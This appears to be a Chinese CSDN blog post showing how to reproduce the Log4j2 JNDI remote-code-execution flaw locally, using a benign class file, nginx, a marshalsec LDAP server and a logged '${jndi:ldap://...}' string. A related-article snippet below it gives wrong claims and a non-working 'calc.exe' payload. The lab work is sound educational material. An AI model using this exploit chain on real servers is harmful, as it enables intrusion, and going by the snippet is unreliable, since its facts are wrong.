Log4j2漏洞复现

最新推荐文章于 2024-04-29 00:09:55 发布
最新推荐文章于 2024-04-29 00:09:55 发布
阅读量8.3k 收藏 4
点赞数 1
分类专栏: JAVA学习 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43719932/article/details/121922387
版权

Log4j2漏洞复现

一、前言

最近Log4j2的漏洞算是刷屏了。博主也就跟风学习了一下,虽不说开发能力有啥提升,但是也算是学了点知识吧。这次就分享一下Log4j2漏洞的复现场景,以供大家参考。

二、参考文章

三、漏洞触发流程图

这里使用LDAP服务进行演示
在这里插入图片描述
解释:Web服务为受害者对象,LDAP和HTTP服务为攻击者对象。

一句话概括:攻击者利用log4j2的JNDI技术发送恶意请求,使受害者获取自己的恶意字节码文件并执行。

四、代码复现

  1. 书写一个恶意字节码文件并用Javac进行编译
public class Log4jRCE {
    static {
        System.out.println("I am Log4jRCE from remote!!!");
    }
}

javac Log4jRCE.java

获得这个字节码文件
在这里插入图片描述

  1. 启动nginx并把class文件放入nginx的html文件夹,可以通过http://ip:port/file.class进行获取
start nginx

浏览器数据http://127.0.0.1:8000/Log4jRCE.class可以获取该字节码文件

  1. 启动LDAP服务器,暴漏这个字节码文件
git clone git@github.com:bkfish/Apache-Log4j-Learning.git
cd Apache-Log4j-Learning/tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE"
  1. 模拟一个server执行log.error()观察运行结果
    写一个RunApp.class
public class RunApp {

    private static final Logger logger = LogManager.getLogger(BugCode.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}");
    }

}

启动结果为
在这里插入图片描述
会发现有一个“I am Log4jRCE from remote!!!”就是远程class文件的逻辑

一名假人
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3731
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2648
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
log4j漏洞复现
weixin_68647219的博客
04-20 4583
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
log4j2远程代码执行漏洞原理及复现
最新发布
m0_57967573的博客
04-29 1464
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6410
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 872
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6697
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j复现过程
weixin_50339832的博客
12-26 2377
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
log4j CVE-2019-17571 漏洞复现
热门推荐
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
Log4j2漏洞复现与分析
xiaolinzi176的博客
12-12 3065
漏洞复现: 结果如下: 可见并不是打印的param具体参数信息,而是打印了服务器版本信息,这样就会产生注入的漏洞,此次漏洞就是由于JNDI导致的,下面介绍下具体的JNDI注入 JNDI:RMI注入 在jdk8u1217u1316u141版本开始默认com.sun.jndi.rmi.object.trustURLCodebase设置为false,rmi加载远程的字节码不会执行成功。 ...
手把手教你复现Log4j2漏洞,千万别中招!
Java知音
12-13 2183
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
log4j 安全问题验证demo & CRLF注入漏洞
weixin_42299862的博客
12-31 7697
一、环境准备 https://blog.csdn.net/weixin_42299862/article/details/111993837 二、demo 1、使用 @Log4j2 log.error() 打印异常日志是否会泄露敏感信息? https://www.cnblogs.com/huanghuanghui/p/11775731.html https://www.cnblogs.com/qlqwjy/p/7192947.html 代码如下 如果有红线语法错误,参考https://blog.csdn.n
Apache Log4j2远程代码执行漏洞复现及修复建议
isxiaole的博客
12-13 6589
环境:本实验使用vulfocus提供的Log4j2远程命令执行靶机。 声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 背景: Apache Log4j2是一款优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 影响版本: 经验证 2.15.0-rc1 版本存在绕.
三个代码执行漏洞复现
gh0stf1re的博客
04-04 5532
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞
apache log4j2 漏洞复现
06-28
### 回答1: Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,需要尽快修复。建议管理员及时更新受影响的软件版本,以保护服务器安全。 ### 回答2: 近日,全球多个国家的安全研究员纷纷发现一个Apache log4j2漏洞,该漏洞编号为CVE-2021-44228,危害严重。攻击者利用该漏洞可以远程执行恶意代码,入侵服务器、系统和网络,导致极大的信息泄露和系统瘫痪风险。本文将介绍如何在实验环境中进行漏洞复现。 1.环境准备 本次复现可以采用一个简单的demo工程,也可以用一些现有的著名开源项目(如Spring、Kafka)进行复现。这里以demo工程为例。 - 操作系统:Ubuntu 18.04.5 LTS - Java环境:JDK 1.8 - 工程环境:IntelliJ IDEA + Maven 2.漏洞安装 使用Maven构建demo工程,然后在pom.xml文件中加入log4j2依赖,可以使用找公用库的方式如下: ``` <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.16.0</version> </dependency> ``` 其中 version 指定在 这一足以管理员权势时 Apache 官方才刚刚修复的漏洞小版本。 3.漏洞验证 编写一个包含漏洞的代码,如下: ``` package cn.xfakir.demo; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class Demo { private static final Logger logger = LogManager.getLogger(Demo.class); public static void main(String[] args) { String payload = "${java.lang.Runtime.getRuntime().exec('calc.exe')}"; logger.info(payload); } } ``` 该代码使用log4j2记录日志的方式,使用 ${} 语法引用payload变量的值,当payload变量的值包含恶意命令时,该漏洞即可成功利用,这里设为calc.exe运行计算器程序。 4.利用漏洞 构建好工程之后,启动demo,如果demo的启动方式是直接运行jar包,可以使用以下命令启动: ``` java -jar Demo-1.0-SNAPSHOT.jar ``` 在控制台看到 INFO 模式下的 ${java.lang.Runtime.getRuntime().exec('calc.exe')} 日志输出,则漏洞被成功利用。 5.修复漏洞 Apache官方已经发布了漏洞修复的版本,建议使用最新版本或对应的补丁,详见官方发布的修复安全公告。除此之外,也可以临时关闭log4j2的服务,防止被攻击。 以上是本文关于apache log4j2漏洞复现的介绍,漏洞的修复和预防对于互联网安全至关重要,希望大家及时更新代码和环境,确保系统网络的安全。 ### 回答3: Apache log4j2是一种流行的Java日志框架,它可以通过配置和代码记录日志。但是,最近发现了一个名为CVE-2021-44228的漏洞,攻击者可以利用该漏洞log4j2中执行任意代码,这是一种非常危险的攻击。 要复现这个漏洞,我们需要遵循以下步骤: 步骤1:下载log4j2的jar文件。可以从log4j官方网站或maven仓库上下载。 步骤2:使用PayloadsAllTheThings项目中提供的一些有效负载对log4j2进行测试。这些有效负载在此处提供https://github.com/cyberheartmi9/CVE-2021-44228。 步骤3:将有效负载复制到代码中。 步骤4:编写一个Java应用程序,用于建立与log4j2之间的连接,并执行有效负载。建议使用MinimalLocking.java,这个java应用程序将在本地服务器上启动log4j2。 步骤5:编译和运行您的Java应用程序。 步骤6:通过TCP端口和JMX控制台,发送构造的payload来攻击log4j2。 在实际操作中,攻击者可能会使用更高级的方法,例如尝试使用日志记录的数据来执行代码。例如,在Java虚拟机中注入Java类,然后在日志输出中使用类的实例。这种方法可能需要攻击者具备更深层次的Java知识。 为了保证系统的安全,建议及时升级log4j2到最新版本,并关注官方通告以了解有关漏洞的最新信息。同时,对于企业用户,建议强化安全性措施,对服务器进行监控和维护,以便及时发现和应对安全漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值